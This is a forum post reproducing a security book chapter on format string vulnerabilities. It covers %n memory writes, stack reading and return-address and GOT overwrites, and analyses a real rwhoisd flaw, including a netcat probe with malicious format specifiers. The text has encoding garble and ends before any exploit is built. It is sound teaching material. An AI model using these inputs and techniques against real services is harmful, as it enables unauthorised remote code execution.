查看單個文章
舊 2004-06-21, 02:37 PM   #9 (permalink)
mic64
註冊會員
 
mic64 的頭像
榮譽勳章
UID - 582
在線等級: 級別:16 | 在線時長:330小時 | 升級還需:27小時級別:16 | 在線時長:330小時 | 升級還需:27小時級別:16 | 在線時長:330小時 | 升級還需:27小時級別:16 | 在線時長:330小時 | 升級還需:27小時級別:16 | 在線時長:330小時 | 升級還需:27小時級別:16 | 在線時長:330小時 | 升級還需:27小時
註冊日期: 2002-12-06
VIP期限: 2007-04
住址: MIB總部
文章: 412
精華: 0
現金: 499 金幣
資產: 499 金幣
預設

Chapter 9 ¡E Format Strings
Introduction
Early in the summer of 2000, the security world was abruptly made aware of a
significant new type of security vulnerabilities in software.This subclass of vulnerabilities,
known as format string bugs, was made public when an exploit for the
Washington University FTP daemon (WU-FTPD) was posted to the Bugtraq
mailing list on June 23, 2000.The exploit allowed for remote attackers to gain
root access on hosts running WU-FTPD without authentication if anonymous
FTP was enabled (it was, by default, on many systems).This was a very high-pro-
file vulnerability because WU-FTPD is in wide use on the Internet.
As serious as it was, the fact that tens of thousands of hosts on the Internet
were instantly vulnerable to complete remote compromise was not the primary
reason that this exploit was such a great shock to the security community.The
real concern was the nature of the exploit and its implications for software everywhere.
This was a completely new method of exploiting programming bugs previously
thought to be benign.This was the first demonstration that format string
bugs were exploitable.
A format string vulnerability occurs when programmers pass externally supplied
data to a printf function as or as part of the format string argument. In the
case of WU-FTPD, the argument to the SITE EXEC ftp command when issued
to the server was passed directly to a printf function.
There could not have been a more effective proof of concept; attackers could
immediately and automatically obtain superuser privileges on victim hosts.
Until the exploit was public, format string bugs were considered by most to
be bad programming form¡Xjust inelegant shortcuts taken by programmers in a
rush¡Xnothing to be overly concerned about. Up until that point, the worst that
had occurred was a crash, resulting in a denial of service.The security world soon
learned differently. Countless UNIX systems have been compromised due to
these bugs.
As previously mentioned, format string vulnerabilities were first made public
in June of 2000.The WU-FTPD exploit was written by an individual known as
tf8, and was dated October 15, 1999. Assuming that through this vulnerability it
was discovered that format string bug conditions could be exploited, hackers had
more than eight months to seek out and write exploits for format string bugs in
other software.This is a conservative guess, based on the assumption that the
WU-FTPD vulnerability was the first format string bug to be exploited.There is
no reason to believe that is the case; the comments in the exploit do not suggest
that the author discovered this new method of exploitation.
www.syngress.com
www.syngress.com
Shortly after knowledge of format string vulnerabilities was public, exploits
for several programs became publicly available.As of this writing, there are dozens
of public exploits for format string vulnerabilities, plus an unknown number of
unpublished ones.
As for their official classification, format string vulnerabilities do not really
deserve their own category among other general software flaws such as race conditions
and buffer overflows. Format string vulnerabilities really fall under the
umbrella of input validation bugs: the basic problem is that programmers fail to
prevent untrusted externally supplied data from being included in the format
string argument.
Format Strings ¡E Chapter 9 321
Format String Vulnerabilities versus Buffer Overflows
On the surface, format string and buffer overflow exploits often look
similar. It is not hard to see why some may group together in the same
category. Whereas attackers may overwrite return addresses or function
pointers and use shellcode to exploit them, buffer overflows and format
string vulnerabilities are fundamentally different problems.
In a buffer overflow vulnerability, the software flaw is that a sensitive
routine such as a memory copy relies on an externally controllable
source for the bounds of data being operated on. For example, many
buffer overflow conditions are the result of C library string copy operations.
In the C programming language, strings are NULL terminated byte
arrays of variable length. The strcpy() (string copy) libc function copies
bytes from a source string to a destination buffer until a terminating
NULL is encountered in the source string. If the source string is externally
supplied and greater in size than the destination buffer, the strcpy()
function will write to memory neighboring the data buffer until the copy
is complete. Exploitation of a buffer overflow is based on the attacker
being able to overwrite critical values with custom data during operations
such as a string copy.
In format string vulnerabilities, the problem is that externally supplied
data is being included in the format string argument. This can be
considered a failure to validate input and really has nothing to do with
data boundary errors. Hackers exploit format string vulnerabilities to
Notes from the Underground¡K
Continued
322 Chapter 9 ¡E Format Strings
This chapter will introduce you to format string vulnerabilities, why they
exist, and how they can be exploited by attackers.We will look at a real-world
format string vulnerability, and walk through the process of exploiting it as a
remote attacker trying to break into a host.
Understanding Format
String Vulnerabilities
To understand format string vulnerabilities, it is necessary to understand what the
printf functions are and how they function internally.
Computer programmers often require the ability for their programs to create
character strings at runtime.These strings may include variables of a variety of
types, the exact number and order of which are not necessarily known to the
programmer during development.The widespread need for flexible string creation
and formatting routines naturally lead to the development of the printf
family of functions.The printf functions create and output strings formatted at
runtime.They are part of the standard C library. Additionally, the printf functionality
is implemented in other languages (such as Perl).
These functions allow for a programmer to create a string based on a format
string and a variable number of arguments.The format string can be considered a
www.syngress.com
write specific values to specific locations in memory. In buffer overflows,
the attacker cannot choose where memory is overwritten.
Another source of confusion is that buffer overflows and format
string vulnerabilities can both exist due to the use of the sprintf() function.
To understand the difference, it is important to understand what
the sprintf function actually does. sprintf() allows for a programmer to
create a string using printf() style formatting and write it into a buffer.
Buffer overflows occur when the string that is created is somehow larger
than the buffer it is being written to. This is often the result of the use
of the %s format specifier, which embeds NULL terminated string of
variable length in the formatted string. If the variable corresponding to
the %s token is externally supplied and it is not truncated, it can cause
the formatted string to overwrite memory outside of the destination
buffer when it is written. The format string vulnerabilities due to the
misuse of sprintf() are due to the same error as any other format string
bugs, externally supplied data being interpreted as part of the format
string argument.
Format Strings ¡E Chapter 9 323
blueprint containing the basic structure of the string and tokens that tell the printf
function what kinds of variable data goes where, and how it should be formatted.
The printf tokens are also known as format specifiers; the two terms are used interchangeably
in this chapter.
The concept behind printf functions is best demonstrated with a small
example:
int main()
{
int integer = 10;
printf("this is the skeleton of the string, %i",integer);
}
www.syngress.com
The printf Functions
This is a list of the standard printf functions included in the standard C
library. Each of these can lead to an exploitable format string vulnerability
if misused.
 printf() This function allows a formatted string to be created
and written to the standard out I/O stream.
 fprintf() This function allows a formatted string to be created
and written to a libc FILE I/O stream.
 sprintf() This function allows a formatted string to be created
and written to a location in memory. Misuse of this
function often leads to buffer overflow conditions.
 snprintf() This function allows a formatted string to be created
and written to a location in memory, with a maximum
string size. In the context of buffer overflows, it is known as
a secure replacement for sprintf().
The standard C library also includes the vprintf(), vfprintf(),
vsprintf(), and vsnprintf() functions. These perform the same functions
as their counterparts listed previously but accept varargs (variable arguments)
structures as their arguments.
Tools & Traps¡K
324 Chapter 9 ¡E Format Strings
In this code example, the programmer is calling printf with two arguments, a
format string and a variable that is to be embedded in the string when that
instance of printf executes.
"this is the skeleton of the string, %i"
This format string argument consists of static text and a token (%i), indicating
variable data. In this example, the value of this integer variable will be included,
in Base10 character representation, after the comma in the string output when
the function is called.
The following program output demonstrates this (the value of the integer
variable is 10):
[dma@victim server]$ ./format_example
this is the skeleton of the string, 10
Because the function does not know how many arguments it will receive,
they are read from the process stack as the format string is processed based on the
data type of each token. In the previous example, a single token representing an
integer variable was embedded in the format string.The function expects a variable
corresponding to this token to be passed to the printf function as the second
argument. On the Intel architecture (at least), arguments to functions are pushed
onto the stack before the stack frame is created.When the function references its
arguments on these platforms, it references data on the stack beneath the stack
frame.
NOTE
In this chapter, we use the term beneath to describe data that was
placed on the stack before the data we are suggesting is above. On the
Intel architecture, the stack grows down. On this and other architectures
with stacks that grow down, the address of the top of the stack
decreases numerically as the stack grows. On these systems, data that is
described as beneath the other data on the stack has a numerically
higher address than data above it.
The fact that numerically higher memory addresses may be lower in
the stack can cause confusion. Be aware that a location in the stack
described as above another means that it is closer to the top of the stack
than the other location.
www.syngress.com
Format Strings ¡E Chapter 9 325
In our example, an argument was passed to the printf function corresponding
to the %i token¡Xthe integer variable.The Base10 character representation of
the value of this variable (10) was output where the token was placed in the
format string.
When creating the string that is to be output, the printf function will retrieve
whatever value of integer data type size is at the right location in the stack and use
that as the variable corresponding to the token in the format string.The printf function
will then convert the binary value to a character representation based on the
format specifier and include it as part of the formatted output string. As will be
demonstrated, this occurs regardless of whether the programmer has actually passed
a second argument to the printf function or not. If no parameters corresponding to
the format string tokens were passed, data belonging to the calling function(s) will
be treated as the arguments, because that is what is next on the stack.
Let¡¦s go back to our example, pretending that we had later decided to print
only a static string but forgot to remove the format specifier.The call to printf
now looks like this:
printf("this is the skeleton of the string, %i");
/* note: no argument. only a format string. */
When this function executes, it does not know that there has not been a variable
passed corresponding to the %i token.When creating the string, the function
will read an integer from the area of the stack where a variable would be had it
been passed by the programmer, the 4 bytes beneath the stack frame. Provided
that the virtual memory where the argument should be can be dereferenced, the
program will not crash and whatever bytes happened to be at that location will
be interpreted as, and output as, an integer.
The following program output demonstrates this:
[dma@victim server]$ ./format_example
this is the skeleton of the string, -1073742952
Recall that no variable was passed as an integer argument corresponding to
the %i format specifier; however, an integer was included in the output string.
The function simply reads bytes that make up an integer from the stack as
though they were passed to the function by the programmer. In this example, the
bytes in memory happened to represent the number ¡V1073742952 as a signed int
data type in Base10.
www.syngress.com
326 Chapter 9 ¡E Format Strings
If users can force their own data to be part of the format string, they cause
the affected printf function to treat whatever happens to be on the stack as legitimate
variables associated with format specifiers that they supply.
As we will see, the ability for an external source to control the internal function
of a printf function can lead to some serious potential security vulnerabilities.
If a program exists that contains such a bug and returns the formatted string to
the user (after accepting format string input), attackers can read possibly sensitive
memory contents. Memory can also be written to through malicious format
strings by using the obscure format specifier %n.The purpose of the %n token is
to allow programmers to obtain the number of characters output at predetermined
points during string formatting. How attackers can exploit format string
vulnerabilities will be explained in detail as we work toward developing a functional
format string exploit.
Why and Where Do Format
String Vulnerabilities Exist?
Format string vulnerabilities are the result of programmers allowing externally
supplied, unsanitized data in the format string argument.These are some of the
most commonly seen programming mistakes resulting in exploitable format string
vulnerabilities.
The first is where a printf function is called with no separate format string
argument, simply a single string argument. For example:
printf(argv[1]);
In this example, the second argument value (often the first command line
argument) is passed to printf() as the format string. If format specifiers have been
included in the argument, they will be acted upon by the printf function:
[dma@victim]$ ./format_example %i
-1073742936
This mistake is usually made by newer programmers, and is due to unfamiliarity
with the C library string processing functions. Sometimes this mistake is
due to the programmer¡¦s laziness, neglecting to include a format string argument
for the string (i.e., %s).This reason is often the underlying cause of many different
types of security vulnerabilities in software.
The use of wrappers for printf() style functions, often for logging and error
reporting functions, is very common.When developing, programmers may forget
www.syngress.com
Format Strings ¡E Chapter 9 327
that an error message function calls printf() (or another printf function) at some
point with the variable arguments it has been passed.They may simply become
accustomed to calling it as though it prints a single string:
error_warn(errmsg);
The vulnerability that we are going to exploit in this chapter is due to an
error similar to this.
One of the most common causes of format string vulnerabilities is improper
calling of the syslog() function on UNIX systems. syslog() is the programming
interface for the system log daemon. Programmers can use syslog() to write error
messages of various priorities to the system log files. As its string arguments,
syslog() accepts a format string and a variable number of arguments corresponding
to the format specifiers. (The first argument to syslog() is the syslog priority level.)
Many programmers who use syslog() forget or are unaware that a format string
separate from externally supplied log data must be passed. Many format string
vulnerabilities are due to code that resembles this:
syslog(LOG_AUTH,errmsg);
If errmsg contains externally supplied data (such as the username of a failed
login attempt), this condition can likely be exploited as a typical format string
vulnerability.
How Can They Be Fixed?
Like most security vulnerabilities due to insecure programming, the best solution
to format string vulnerabilities is prevention. Programmers need to be aware that
these bugs are serious and can be exploited by attackers. Unfortunately, a global
awakening to security issues is not likely any time soon.
For administrators and users concerned about the software they run on their
system, a good policy should keep the system reasonably secure. Ensure that all
setuid binaries that are not needed have their permissions removed, and all
unnecessary services are blocked or disabled.
Mike Frantzen published a workaround that could be used by administrators
and programmers to prevent any possible format string vulnerabilities from being
exploitable. His solution involves attempting to count the number of arguments
passed to a printf() function compared to % tokens in the format string.This
workaround is implemented as FormatGuard in Immunix, a distribution of Linux
designed to be secure at the application level.
www.syngress.com
328 Chapter 9 ¡E Format Strings
Mike Frantzen¡¦s Bugtraq post is archived at www.securityfocus.com/
archive/1/72118. FormatGuard can be found at www.immunix.org/
formatguard.html.
How Format String Vulnerabilities Are Exploited
There are three basic goals an attacker can accomplish by exploiting format string
vulnerabilities. First, the attacker can cause a process to fail due to an invalid
memory access.This can result in a denial of service. Second, attackers can read
process memory if the formatted string is output. Finally, memory can be overwritten
by attackers¡Xpossibly leading to execution of instructions.
www.syngress.com
Using Format Strings to Exploit Buffer Overflows
User-supplied format specifiers can also be used to aid in exploiting
buffer overflow conditions. In some situations, an sprintf() condition
exists that would be exploitable if it were not for length limitations
placed on the source strings prior to them being passed to the insecure
function. Due to these restrictions, it may not be possible for an attacker
to supply an oversized string as the format string or the value for a %s
in an sprintf call.
If user-supplied data can be embedded in the format string argument
of sprintf(), the size of the string being created can be inflated by
using padded format specifiers. For example, if the attacker can have
%100i included in the format string argument for sprintf, the output
string may end up more than 100 bytes larger than it should be. The
padded format specifier may create a large enough string to overflow the
destination buffer. This may render the limits placed on the data by the
programmer useless in protecting against overflows and allow for the
exploitation of this condition by an attacker to execute arbitrary code.
We will not discuss this method of exploitation further. Although it
involves using format specifiers to overwrite memory, the format speci-
fier simply is being used to enlarge the string so that a typical stack over-
flow condition can occur. This chapter is for exploitation using only
format specifiers, without relying on another vulnerability due to a separate
programmatic flaw such as buffer overflows. Additionally, the
described situation could also be exploited as a regular format string
vulnerability using only format specifiers to write to memory.
Damage & Defense¡K
Format Strings ¡E Chapter 9 329
Denial of Service
The simplest way that a format string vulnerability can be exploited is to cause a
denial of service through forcing the process to crash. It is relatively easy to cause
a program to crash with malicious format specifiers.
Certain format specifiers require valid memory addresses as corresponding
variables. One of them is %n, which we just discussed and which we will explain
in further detail soon. Another is %s, which requires a pointer to a NULL terminated
string. If an attacker supplies a malicious format string containing either of
these format specifiers, and no valid memory address exists where the corresponding
variable should be, the process will fail attempting to dereference whatever
is in the stack.This may cause a denial of service and does not require any
complicated exploit method.
In fact, there were a handful of known problems caused by format strings
that existed before anyone understood that format strings were exploitable. For
example, it was know that it was possible to crash the BitchX IRC client by passing
%s%s%s%s as one of the arguments for certain IRC commands. However, as far as
we know, no one realized this was further exploitable until the WU-FTPD exploit
came to light.
There is not much more to crashing processes using format string.There are
much more interesting and useful things an attacker can do with format string
vulnerabilities.
Reading Memory
If the output of the format string function is available, attackers can also exploit
these vulnerabilities to read process memory.This is a serious problem and can
lead to disclosure of sensitive information. For example, if a program accepts
authentication information from clients and does not clear it immediately after
use, format string vulnerabilities can be used to read it.The easiest way for an
attacker to read memory due to a format string vulnerability is to have the function
output memory as variables corresponding to format specifiers.These variables
are read from the stack based on the format specifiers included in the
format string. For example, 4 byte values can be retrieved for each instance of
%x.The limitation of reading memory this way is that it is limited to only data
on the stack.
It is also possible for attackers to read from arbitrary locations in memory
by using the %s format specifier. As described earlier, the %s format specifier
corresponds to a NULL terminated string of characters.This string is passed by
www.syngress.com
330 Chapter 9 ¡E Format Strings
reference. An attacker can read memory in any location by supplying a %s format
specifier and a corresponding address variable to the vulnerable program.The
address where the attacker would like reading to begin must also be placed in the
stack in the same manner that the address corresponding to any %n variables
would be embedded.The presence of a %s format specifier would cause the
format string function to read in bytes starting at the address supplied by the
attacker until a NULL byte is encountered.
The ability to read memory is very useful to attackers and can be used in
conjunction with other methods of exploitation. How to do this will be
described in detail and will be used in the exploit we are developing toward the
end of this chapter.
Writing to Memory
Previously, we touched on the %n format specifier.This formerly obscure token
exists for the purpose of indicating how large a formatted string is at runtime.
The variable corresponding to %n is an address.When the %n token is encountered
during printf processing, the number (as an integer data type) of characters
that make up the formatted output string is written to the address argument corresponding
to the format specifier.
The existence of such a format specifier has serious security implications: it
can allow for writes to memory.This is the key to exploiting format string vulnerabilities
to accomplish goals such as executing shellcode.
Single Write Method
The first method that we will talk about involves using only the value of a single
%n write to elevate privileges.
In some programs, critical values such as a user¡¦s userid or groupid is stored in
process memory for purposes of lowering privileges. Format string vulnerabilities
can be exploited by attackers to corrupt these variables.
An example of a program with such a vulnerability is the Screen utility.
Screen is a popular UNIX utility that allows for multiple processes to use a single
pseudoterminal.When installed setuid root, Screen stores the privileges of the
invoking user in a variable.When a window is created, the Screen parent process
lowers privileges to the value stored in that variable for the children processes
(the user shell, etc.).
Versions of Screen prior to and including 3.9.5 contained a format string vulnerability
when outputting the user-definable visual bell string.This string,
www.syngress.com
Format Strings ¡E Chapter 9 331
defined in the user¡¦s .screenrc configuration file, is output to the user¡¦s terminal as
the interpretation of the ASCII beep character.When output, user-supplied data
from the configuration file is passed to a printf function as part of the format
string argument.
Due to the design of Screen, this particular format string vulnerability could
be exploited with a single %n write. No shellcode or construction of addresses
was required.The idea behind exploiting Screen is to overwrite the saved userid
with one of the attacker¡¦s choice, such as 0 (root¡¦s userid).
To exploit this vulnerability, an attacker had to place the address of the saved
userid in memory reachable as an argument by the affected printf function.The
attacker must then create a string that places a %n at the location where a corresponding
address has been placed in the stack.The attacker can offset the target
address by 2 bytes and use the most significant bits of the %n value to zero-out
the userid.The next time a new window is created by the attacker, the Screen
parent process would set the privileges of the child to the value that has replaced
the saved userid.
By exploiting the format string vulnerability in Screen, it was possible for
local attackers to elevate to root privileges.The vulnerability in Screen is a good
example of how some programs can be exploited by format string vulnerabilities
trivially.The method described is largely platform independent as well.
Multiple Writes Method
Now we move on to using multiple writes to locations in memory.This is
slightly more complicated but has more interesting results.Through format string
vulnerabilities it is often possible to replace almost any value in memory with
whatever the attacker likes.To explain this method, it is important to understand
the %n parameter and what gets written to memory when it is encountered in a
format string.
To recap, the purpose of the %n format specifier is to print the number of
characters to be output so far in the formatted string. An attacker can force this
value to be large, but often not large enough to be a valid memory address (for
example, a pointer to shellcode). Because of this reason, it is not possible to
replace such a value with a single %n write.To get around this, attackers can use
successive writes to construct the desired word byte by byte. By using this technique,
a hacker can overwrite almost any value with arbitrary bytes.This is how
arbitrary code is executed.
www.syngress.com
332 Chapter 9 ¡E Format Strings
How Format String Exploits Work
Let¡¦s now investigate how format string vulnerabilities can be exploited to overwrite
values such as memory addresses with whatever the attacker likes. It is
through this method that hackers can force vulnerable programs to execute shellcode.
Recall that when the %n parameter is processed, an integer is written to a
location in memory.The address of the value to be overwritten must be in the
stack where the printf function expects a variable corresponding to a %n format
specifier to be. An attacker must somehow get an address into the stack and then
write to it by placing %n at the right location in their malicious format string.
Sometimes this is possible through various local variables or other program-specific
conditions where user-controllable data ends up in the stack.
There is usually an easier and more consistently available way for an attacker
to specify their target address. In most vulnerable programs, the user-supplied
format string passed to a printf function exists in a local variable on the stack
itself. Provided that that there is not too much data as local variables, the format
string is usually not too far away from the stack frame belonging to the affected
printf function call. Attackers can force the function to use an address of their
choosing if they include it in their format string and place an %n token at the
right location.
Attackers have the ability to control where the printf function reads the
address variable corresponding to %n. By using other format specifiers, such as
%x or %p, the stack can be traversed or ¡§eaten¡¨¡¦ by the printf function until it
reaches the address embedded in the stack by the attacker. Provided that user data
making up the format string variable isn¡¦t truncated, attackers can cause printf to
read in as much of the stack as is required, until printf() reads as variables addresses
they have placed in the stack. At those points they can place %n specifiers that
will cause data to be written to the supplied addresses.
NOTE
There cannot be any NULL bytes in the address if it is in the format string
(except as the terminating byte), as the string is a NULL terminated array
just like any other in C. This does not mean that addresses containing
NULL bytes can never be used¡Xaddresses can often be placed in the
stack in places other than the format string itself. In these cases it may
be possible for attackers to write to addresses containing NULL bytes.
www.syngress.com
Format Strings ¡E Chapter 9 333
For example, an attacker who wishes to use an address stored 32 bytes away
from where a printf() function reads its first variable can use 8 %x format speci-
fiers.The %x token outputs the value, in Base16 character representation, of a 4-
byte word on 32-bit Intel systems. For each instance of %x in the format string,
the printf function reads 4 bytes deeper into the stack for the corresponding variable.
Attackers can use other format specifiers to push printf() into reading their
data as variables corresponding to the %n specifier.
Once an address is read by printf() as the variable corresponding to a %n
token, the number of characters output in the formatted string at that point will
be stored there as an integer.This value will overwrite whatever exists at the
address (assuming it is a valid address and writeable memory).
Constructing Values
An attacker can manipulate the value of the integer that is written to the target
address. Hackers can use the padding functionality of printf to expand the number
of characters to be output in the formatted string.
int main()
{
// test.c
printf("start: %10i end\n",10);
}
In the preceding example, the %10i token in the format string is an integer
format specifier containing a padding value.The padding value tells the printf()
function to use 10 characters when representing the integer in the formatted
string.
[dma@victim server]$./test
start: 10 end
The decimal representation of the number 10 does not require 10 characters,
so by default the extra ones are spaces.This feature of printf() can be used by
attackers to inflate the value written as %n without having to create an excessively
long format string. Although it is possible to write larger numbers, the
values attackers wish to write are often much larger than can be created using
padded format specifiers.
By using multiple writes through multiple %n tokens, attackers can use the
least significant bytes of the integer values being written to write each byte
www.syngress.com
334 Chapter 9 ¡E Format Strings
comprising the target value separately.This will allow for the construction of a
word such as an address using the relatively low numerical values of %n.To
accomplish this, attackers must specify addresses for each write successive to the
first offset from the target by one byte.
By using four %n writes and supplying four addresses, the low-order bits of
the integers being written are used to write each byte value in the target word
(see Figure 9.1).
On some platforms (such as RISC systems), writes to memory addresses not
aligned on a 2-byte boundary are not permitted.This problem can be solved in
many cases by using short integer writes using the %hn format specifier.
Constructing custom values using successive writes is the most serious
method of exploitation, as it allows for attackers to gain complete control over
the process.This can be accomplished by overwriting pointers to instructions
www.syngress.com
Figure 9.1 Address Being Constructed Using Four Writes
Format Strings ¡E Chapter 9 335
with pointers to attacker-supplied shellcode. If an attacker exploits a vulnerability
this way, the flow of program execution can be modified such that the shellcode
is executed by the process.
What to Overwrite
With the ability to construct any value at almost any location in memory, the
question is now ¡§what should be overwritten?¡¨ Given that nearly any address can
be used, the hacker has many options.The attacker can overwrite function return
addresses, which is the same thing done when stack-based buffer overflows are
exploited. By overwriting the current function return address, shellcode can be
executed when the function returns. Unlike overflows, attackers are not limited
to return addresses, though.
Overwriting Return Addresses
Most stack-based buffer overflow vulnerabilities involve the attacker replacing the
function return address with a pointer to other instructions.When the function
that has been corrupted finishes and attempts to return to the calling block of
code, it instead jumps to wherever the replacement return address points.The
reason that attackers exploiting stack overflows overwrite return addresses is
because that is usually all that can be overwritten.The attacker does not get a
choice of where their data ends up, as it is usually copied over data neighboring
the affected buffer. Format string vulnerabilities differ in that the write occurs at
the location specified by the address corresponding to the %n specifier.An
attacker exploiting a format string vulnerability can overwrite a function return
address by explicitly addressing one of the target addresses.When the function
returns, it will return to the address constructed by the attacker¡¦s %n writes.
There are two possible problems that attackers face when overwriting function
return addresses.The first is situations where a function simply does not
return.This is common in format string vulnerabilities because many of them
involve printing error output.The program may simply output an error message
(with the externally supplied data passed as the format string argument) and call
exit() to terminate the program. In these conditions, overwriting a return address
for anything other than the printf function itself will not work.The second
problem is that overwriting return addresses can be caught by anti-buffer-over-
flow mechanisms such as StackGuard.
www.syngress.com
336 Chapter 9 ¡E Format Strings
Overwriting Global Offset Table
Entries and Other Function Pointers
The global offset table (GOT) is the section of an ELF program that contains
pointers to library functions used by the program. Attackers can overwrite GOT
entries with pointers to shellcode that will execute when the library functions
are called.
Not all binaries being exploited are of the ELF format.This leaves general
function pointers, which are easy targets for programs that use them. Function
pointers are variables that the programmer creates and must be present in the
program for an attacker to exploit them. In addition to this, the function must
be called by reference using the function pointer for the attacker¡¦s shellcode to
execute.
Examining a Vulnerable Program
We¡¦ll now decide on a program to use to demonstrate the exploitation of a
format string vulnerability.The vulnerability should be remotely exploitable.
Penetration of computer systems by attackers from across the Internet without
any sort of credentials beforehand best demonstrates the seriousness of format
string vulnerabilities.The vulnerability should be real in a program with a wellknown
or respected author, to demonstrate that vulnerabilities can and do exist
in software we may trust to be well written. Our example should also have several
properties that allow us to explore the different aspects of exploiting format
string vulnerabilities, such as outputting the formatted string.
The program we will use as our example is called Rwhoisd. Rwhoisd, or the
RWHOIS daemon, is an implementation of the RWHOIS service.The research
and development branch of Network Solutions, Inc currently maintains the
rwhoisd RWHOIS server and it is published under the GNU Public License.
A classic remotely exploitable format string vulnerability exists in versions
1.5.7.1 of rwhoisd and earlier.The format string vulnerability allows for unauthenticated
clients who can connect to the service to execute arbitrary code.The
vulnerability was first made public through a post to the Bugtraq mailing list (the
message is archived at www.securityfocus.com/archive/1/222756).
To understand the format string vulnerability that was present in rwhoisd,
we must look at its source code.The version we are examining is version
1.5.7.1. At the time of writing, it is available for download at the Web site
www.rwhois.net/ftp.
www.syngress.com
Format Strings ¡E Chapter 9 337
www.syngress.com
Some High Profile Format String Vulnerabilities
Besides the WU-FTPD SITE EXEC format string vulnerability, there have
been several others worth mentioning. Some of these have been used in
worms and mass-hacking utilities and have directly resulted in thousands
of hosts being compromised.
IRIX Telnetd Client-supplied data included in the format
string argument for syslog() allowed for remote attackers to
execute arbitrary code without authenticating. This vulnerability
was discovered by the Last Stage of Delirium. (See
www.securityfocus.com/bid/1572.)
Linux rpc.statd This format string vulnerability was due to
the misuse of syslog() as well and could also be exploited to
gain root privileges remotely. It was discovered by Daniel
Jacobowitz and published on July 16, 2000 in a post to
Bugtraq. (See www.securityfocus.com/bid/1480.)
Cfingerd Another format string vulnerability due to syslog()
discovered by Megyer Laszlo. Successful exploitation can
result in remote attackers gaining control of the underlying
host. (See www.securityfocus.com/bid/2576.)
Multiple Vendor LibC Locale Implementation Jouko
Pynnonen and Core SDI independently discovered a format
string vulnerability in the C library implementations shipped
with several UNIX systems. The vulnerability allowed for
attackers to gain elevated privileges locally by exploiting
setuid programs. (See www.securityfocus.com/bid/1634.)
Multiple CDE Vendor rpc.ttdbserverd ISS X-Force discovered
a vulnerability related to the misuse of syslog() in versions
of the ToolTalk database server daemon shipped with
several operating systems that include CDE. This vulnerability
allows for remote, unauthenticated attackers to execute arbitrary
code on the victim host. (See www.securityfocus.com/
bid/3382.)
Notes from the Underground¡K
338 Chapter 9 ¡E Format Strings
The vulnerability is present when an error message in response to an invalid
argument to the ¡Vsoa command is to be output.
Error messages are created and output using a standard function called
print_error().This function is called throughout the server source code to handle
reporting of error conditions to the client or user. It accepts an integer argument
to specify the error type as well as a format string and a variable number of arguments.
The source code to this function is in the common/client_msgs.c source file
(path is relative to the directory created when the 1.5.7.1 source tarball is unarchived).
/* prints to stdout the error messages. Format: %error ### message
text, where ### follows rfc 640 */
void
print_error(va_alist)
va_dcl
{
va_list list;
int i;
int err_no;
char *format;
if (printed_error_flag)
{
return;
}
va_start(list);
err_no = va_arg(list, int);
for (i = 0; i < N_ERRS; i++)
{
if (errs[i].err_no == err_no)
{
printf("%%error %s", errs[i].msg);
break;
}
}
format = va_arg(list, char*);
www.syngress.com
Format Strings &iexcl;E Chapter 9 339
if (*format)
{
printf(": ");
}
vprintf(format, list);
va_end(list);
printf("\n");
printed_error_flag = TRUE;
}
The bolded line is where the arguments passed to this function are passed to
vprintf().The format string vulnerability is not in this particular function, but in
the use of it. Print_error() relies on the calling function to pass it a valid format
string and any associated variables.
This function is a listed here because it is a good example of the kind of situation
that leads to exploitable format string vulnerabilities. Many programs have
functions very similar to print_error(). It is a wrapper for printing error messages in
the style of syslog(), with an error code and printf() style variable arguments.The
problem though, as discussed in the beginning of the chapter, is that programmers
may forget that a format string argument must be passed.
We will now look at what happens when a client connects to the service and
attempts to pass format string data to the vprintf() function through the
print_error() wrapper.
To those of you who have downloaded the source code, the offending section
of code is in the server/soa.c source file.The function in which the offending
code exists is called soa_parse_args().The surrounding code has been stripped for
brevity.The vulnerable call exists on line 53 (it is in bold in this listing):
..
auth_area = find_auth_area_by_name(argv[i]);
if (!auth_area)
{
print_error(INVALID_AUTH_AREA, argv[i]);
free_arg_list(argv);
dl_list_destroy(soa_arg);
return NULL;
}
www.syngress.com
340 Chapter 9 &iexcl;E Format Strings
In this instance of print_error(), the variable argv[i] is passed as the format string
argument to print_error().The string will eventually be passed to the vprintf() function
(as previously pointed out).To a source code auditor, this looks suspiciously
exploitable.The proper way to call this function would be:
print_error(INVALID_AUTH_AREA, "%s", argv[i]);
In this example, argv[i] is passed to the print_error() function as a variable corresponding
to the %s (string) token in the format string.The way that this function
is called eliminates the possibility of any maliciously placed format specifiers
in argv[i] from being interpreted/acted upon by the vprintf() called by print_error().
The string argv[i] is the argument to the -soa directive passed to the server by the
client.
To summarize, when a client connects to the rwhoisd server and issues a -soa
command, an error message is output via print_error() if the arguments are invalid.
The path of execution leading up to this looks like this:
1. Server receives -soa argument, and calls soa_directive() to handle the
command.
2. soa_directive() passes the client command to soa_parse_args(), which
interprets the arguments to the directive.
3. soa_parse_args() detects an error and passes an error code and the command
string to the print_error() function as the format string argument.
4. print_error() passes the format string containing data from the client to
the vprintf() function (highlighted in the previous section).
It is clear now that remote clients can have data passed to vprintf() as the
format string variable.This data is the argument to the -soa directive. By connecting
to the service and supplying a malicious format string, attackers can write
to memory belonging to the server process.
Testing with a Random Format String
Having located a possible format string vulnerability in the source code, we can
now attempt to demonstrate that it is exploitable through supplying malicious
input and observing the server reaction.
Programs with suspected format string vulnerabilities can be forced to exhibit
some form of behavior that indicates their presence. If the vulnerable program
outputs the formatted string, their existence is obvious. If the vulnerable program
www.syngress.com
Format Strings &iexcl;E Chapter 9 341
does not output the formatted string, the behavior of the program in response to
certain format specifiers can suggest the presence of a format string vulnerability.
If the process crashes when %n%n is input, it&iexcl;&brvbar;s likely that a memory access
violation occurred when attempting to write to invalid addresses read from the
stack. It is possible to identify vulnerable programs by supplying these format
specifiers to a program that does not output the formatted string. If the process
crashes, or if the program does not return any output at all and appears to terminate,
it is likely that there is a format string vulnerability.
Back to our example, the formatted string is returned to the client as part of
the server error response.This makes the job of an attacker looking for a way into
the host simple.The following example demonstrates the output of rwhoisd that
is indicative of a format string bug:
[dma@victim server]$ nc localhost 4321
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa am_%i_vulnerable
%error 340 Invalid Authority Area: am_-1073743563_vulnerable
In this example, connecting to the service and transmitting a format specifier
in the data suspected to be included as a format string variable caused
&iexcl;V1073743563 to be included in the server output where the literal %i should be.
The negative number output is the interpretation of the 4 bytes on the stack
where the printf function was expecting a variable as a signed integer.This is con-
firmation that there is a format string vulnerability in rwhoisd.
Having identified a format string vulnerability both in the program source
code and through program behavior, we should set about exploiting it.This particular
vulnerability is exploitable by a remote client from across a network. It
does not require any authentication and it is likely that it can be exploited by
attackers to gain access to the underlying host.
